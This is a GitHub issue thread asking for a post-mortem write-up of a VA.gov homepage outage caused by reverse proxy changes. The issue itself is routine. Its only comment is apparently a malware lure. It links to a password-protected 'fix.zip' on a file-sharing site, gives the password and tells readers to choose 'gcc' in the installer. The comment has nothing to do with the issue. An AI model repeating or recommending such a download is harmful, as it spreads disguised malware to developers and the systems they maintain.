### ISSUE TITLE
NB Homepage Outage Post Mortem Doc

### ISSUE THREAD

**Issue by mreed101** [department-of-veterans-affairs/next-build#710]
## Description

On 8/20/2024 changes to reverse proxy caused an outage of the VA.gov homepage. This ticket is to create a post mortem document that will capture the following details.

- People involved
- Impact
- Summary
- What went wrong, how to do better
- Root cause
- Owndership
- Stakeholders
- Timeline

## Acceptance Criteria

- [x] Artifact detailing the above

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
